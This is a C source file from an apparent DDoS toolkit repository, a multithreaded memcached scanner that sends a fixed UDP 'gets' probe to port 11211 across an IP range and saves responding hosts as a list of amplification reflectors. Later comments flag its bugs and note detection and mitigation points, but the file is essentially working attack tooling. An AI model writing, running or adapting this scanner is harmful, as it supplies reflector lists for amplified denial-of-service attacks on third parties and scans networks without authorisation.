GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/DDOS Scripts/AMP Methods/Memcache Amplification/scanner.c
/*
* Priv8 Priv8 Priv8 Priv8 Priv8 Priv8
*/
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <math.h>
#include <ctype.h>
#include <errno.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
/*
 * Process-wide state shared by main(), the flood() workers and the
 * recievethread() listener.
 *
 * NOTE(review): every counter below is a plain `volatile` object that more
 * than one thread updates with ++, -- or +=. No lock or atomic operation is
 * visible in this file, and `volatile` does not make a read-modify-write
 * atomic, so these values are racy and only approximate.
 */
volatile int running_threads = 0;       /* ++ on entry to flood(), -- on exit; polled by main() */
volatile int found_srvs = 0;            /* ++ per accepted reply in recievethread(); never read in this file */
volatile unsigned long per_thread = 0;  /* addresses per worker, computed in main() */
volatile unsigned long start = 0;       /* first address as returned by inet_addr() (network byte order) */
volatile unsigned long scanned = 0;     /* ++ per datagram in flood(); zeroed every second by main() */
volatile int sleep_between = 0;         /* parsed from argv[5] in main(); not read anywhere else in this file */
volatile int bytes_sent = 0;            /* += size per datagram in flood(); zeroed every second by main() */
volatile unsigned long hosts_done = 0;  /* ++ per datagram in flood(); never read in this file */
FILE *fd;                               /* output list, opened in append mode by main() */
/*
 * Fixed probe datagram. The first eight bytes have the layout of a memcached
 * UDP frame header (request id 0x0001, sequence number 0, datagram count 1,
 * reserved 0); the rest is an ASCII multi-key "gets" request terminated by
 * CRLF.
 *
 * Defensive relevance: the bytes are constant, so a datagram to UDP port
 * 11211 carrying exactly this content is a usable network-detection
 * signature. A memcached instance does not answer it when its UDP listener
 * is disabled (`-U 0`), when it is bound to a loopback/internal address
 * (`-l`), or when 11211/udp is filtered at the network edge.
 */
char payload[] =
"\0\x01\0\0\0\x01\0\0gets a b c d e f g h j k l m n o p q r s t w v u x y a\r\n";

/*
 * NOTE(review): no type specifier, so this relies on pre-C99 "implicit int";
 * C99 and later compilers warn about or reject it. sizeof counts the string
 * literal's terminating NUL, so each datagram sent with this length ends in
 * a 0x00 byte after the CRLF.
 */
size = sizeof(payload);
/*
 * Worker thread: sends the global `payload` datagram once to UDP port 11211
 * of every address in this worker's slice of the configured range.
 *
 * par1 is the worker index that main() passes as an integer cast to a
 * pointer. The slice runs from start + per_thread*index up to, but not
 * including, start + per_thread*(index+1), with the arithmetic done in host
 * byte order.
 *
 * What this looks like on the wire: one unbound UDP socket per worker, so
 * each worker emits identical datagrams from a single source port to
 * dst port 11211 on consecutive destination addresses. `sleep_between` is
 * not read here, so nothing in this loop paces the sends.
 *
 * NOTE(review): the function is declared to return void * but ends with a
 * bare `return;`, so no defined value is handed back to the thread library.
 */
void *flood(void *par1)
{
    /* Unsynchronised update of a counter shared with the other workers and main(). */
    running_threads++;
    /* Pointer-to-int cast; truncates where pointers are wider than int. */
    int thread_id = (int)par1;
    /* Both bounds are stored in network byte order and converted back at the loop. */
    unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
    unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
    unsigned long w;
    /* y, buf and sizeofpayload are not used after the memset below. */
    int y;
    unsigned char buf[65536];
    memset(buf, 0x01, 65);
    int sizeofpayload = 65;
    int sock;
    if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
        printf("[+] MemCached [+] Somenthing are wrong, try again. [+] MemCached [+]\n");
        /* exit() ends the whole process, not only this worker. */
        exit(-1);
    }
    /*
     * `end` already holds a network-order value, so the htonl() here swaps
     * it back; the comparison is therefore between two host-order numbers.
     */
    for(w=ntohl(start_ip);w<htonl(end);w++)
    {
        struct sockaddr_in servaddr;
        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(w);
        servaddr.sin_port=htons(11211);
        /* Return value ignored: the counters below advance even if the send failed. */
        sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
        bytes_sent+=size;
        scanned++;
        hosts_done++;
    }
    close(sock);
    running_threads--;
    return;
}
/*
 * SIGINT handler installed by main(): closes the output file, prints a
 * newline and terminates the process with status 0. `sig` is not used.
 *
 * NOTE(review): fclose(), printf() and exit() are not async-signal-safe, so
 * calling them from a handler is undefined if the signal interrupts another
 * stdio call (the listener thread writes to the same FILE). `fd` is also
 * passed to fclose() without a NULL check, and main() never checks that
 * fopen() succeeded.
 */
void sighandler(int sig)
{
    fclose(fd);
    printf("\n");
    exit(0);
}
/*
 * Listener thread: reads every inbound UDP packet through a raw socket and
 * records the sender of any packet whose UDP source port is 11211 and whose
 * length exceeds a fixed threshold. The sender address is printed and
 * appended to the global output file `fd`.
 *
 * The filter is source port plus size only. Nothing ties a packet to an
 * address that flood() probed, so any host that sends a large enough
 * datagram from port 11211 is recorded, and a host that sends several such
 * datagrams is recorded several times.
 *
 * On Linux a SOCK_RAW socket needs CAP_NET_RAW (normally root), so this
 * thread exits the process when run without that privilege.
 *
 * NOTE(review): declared with an empty parameter list although
 * pthread_create() expects void *(*)(void *); the loop never terminates, so
 * the close() at the end is unreachable and the function has no return
 * statement.
 */
void *recievethread()
{
    printf("\n");
    /* saddr_size is int, while recvfrom() takes a socklen_t * for this argument. */
    int saddr_size, data_size, sock_raw;
    struct sockaddr_in saddr;
    struct in_addr in;   /* unused */

    /* Allocation is not checked for NULL and is never freed. */
    unsigned char *buffer = (unsigned char *)malloc(65536);
    sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
    if(sock_raw < 0)
    {
        printf("[+] MemCached [+] Somenthing are wrong, try again. [+] MemCached [+]\n");
        exit(1);
    }
    while(1)
    {
        saddr_size = sizeof saddr;
        /* With this socket type the data starts at the IP header. */
        data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
        if(data_size <0 )
        {
            printf("[+] MemCached [+] Somenthing are wrong, try again. [+] MemCached [+]\n");
            exit(1);
        }
        struct iphdr *iph = (struct iphdr*)buffer;
        /* 17 is the IP protocol number for UDP. */
        if(iph->protocol == 17)
        {
            /*
             * NOTE(review): the header length comes from the packet and is
             * not compared with data_size, so for a short packet the UDP
             * header fields below can be stale bytes from an earlier
             * datagram (still inside the 65536-byte buffer).
             */
            unsigned short iphdrlen = iph->ihl*4;
            struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
            /*
             * Shadows the global `payload` and is never read. The constant
             * 67 is not explained anywhere in this file.
             */
            unsigned char* payload = buffer + iphdrlen + 67;
            if(ntohs(udph->source) == 11211)
            {
                /* Bytes remaining after the IP header and the same 67-byte offset. */
                int body_length = data_size - iphdrlen - 67;

                if (body_length > 40)

                {
                    found_srvs++;
                    printf("[+] MemCached [+] Found New Server %s.\n", inet_ntoa(saddr.sin_addr));
                    /* fd is used without a NULL check; main() does not verify fopen(). */
                    fprintf(fd,"%s\n",inet_ntoa(saddr.sin_addr));
                    fflush(fd);

                }

            }
        }

    }
    close(sock_raw);

}
/*
 * Entry point. Expects five arguments: start address, end address, output
 * file, worker count and a delay value. It opens the output file in append
 * mode, installs the SIGINT handler, starts the listener thread and then
 * one flood() worker per requested thread, and finally polls
 * running_threads once a second until it reaches zero.
 *
 * NOTE(review): none of the inputs or library calls are validated here:
 *   - fopen(), pthread_create() and malloc() results are not checked;
 *   - atoi() gives no error indication, and a worker count of 0 makes the
 *     per_thread division undefined;
 *   - inet_addr() failure is not detected, and an end address below the
 *     start address makes the unsigned subtraction wrap.
 */
int main(int argc, char *argv[ ])
{

    if(argc < 6){
        printf("[+] MemCached Scanner [+]\n");
        fprintf(stdout, "[+] Use: %s <class to start (192.168.0.1)> <class to end (198.255.255.255)> <file to save list> <threads (30)> <scan delay in ms (20)>\n", argv[0]);
        exit(-1);
    }
    fd = fopen(argv[3], "a");
    /* Stored but never consulted by any function in this file. */
    sleep_between = atoi(argv[5]);

    signal(SIGINT, &sighandler);

    int threads = atoi(argv[4]);
    /* One handle reused for every worker; the workers are never joined or detached. */
    pthread_t thread;

    pthread_t listenthread;
    pthread_create( &listenthread, NULL, &recievethread, NULL);

    /* Each 18-byte allocation is leaked: the pointer is overwritten with argv[] right away. */
    char *str_start = malloc(18);
    memset(str_start, 0, 18);
    str_start = argv[1];
    char *str_end = malloc(18);
    memset(str_end, 0, 18);
    str_end = argv[2];
    start = inet_addr(str_start);
    /* Integer division: any remainder of the range is not assigned to a worker. */
    per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
    unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));   /* unused */
    int i;
    for(i = 0;i<threads;i++){
        /* The worker index travels as an int cast to a pointer. */
        pthread_create( &thread, NULL, &flood, (void *) i);
    }
    /* Presumably gives the workers time to increment running_threads before the poll below. */
    sleep(1);
    printf("[+] MemCached [+] Scanning STARTED! Wait a few minutes..\n\n\n\n\n\n");

    /* Allocated and never used or freed. */
    char *new;
    new = (char *)malloc(16*6);
    while (running_threads > 0)
    {
        fflush(stdout);
        /* The per-second counters are reset, but nothing in this loop prints them. */
        bytes_sent=0;
        scanned = 0;
        sleep(1);
    }
    printf("\n");
    /*
     * The listener thread is still running at this point and uses fd;
     * returning from main() then ends the whole process.
     */
    fclose(fd);
    return 0;
}